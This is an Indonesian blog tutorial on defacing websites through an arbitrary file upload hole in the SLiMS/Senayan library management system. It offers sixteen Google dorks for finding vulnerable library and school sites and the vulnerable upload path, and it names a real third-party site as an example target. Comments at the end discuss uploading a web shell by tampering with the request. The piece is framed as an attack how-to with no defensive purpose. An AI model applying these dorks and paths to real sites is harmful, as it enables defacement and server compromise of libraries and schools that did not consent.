Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability – Kali ini saya akan share metode deface yang mungkin sedang ramai. Saya sendiri sering melihat web yang diretas dengan eksploit ini masuk ke mirror Zone-H. Yup, kita akan membahas bagaimana cara deface dengan exploit Slims CMS Senayan Arbitrary File Upload Vulnerability.
Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability
#Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Date : 28/05/2018 #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High
Oke berikut beberapa dork yang bisa digunakan. Silahkan kembangkan sendiri ya..
#Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 5 : Powered by SLiMS site:id
#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.
#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
#Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System.
It is build on Open source technology like PHP and MySQL.
#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3
#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC
Celahnya ada disini:
/admin/modules/bibliography/pop_attach.php
Contoh
http://www.thaiabc.com/senayan/admin/modules/bibliography/pop_attach.php
Upload file berekstensi txt jpg gif png
Aksesnya ada di
/repository/namafile
Contoh
http://www.thaiabc.com/senayan/repository/hello.png
Oke mungkin sekian tutorial kali ini semoga bermanfaat.
Bisa up shell gk stah?
Gak tau gan
Bisa, Coba aja Tamper Data nya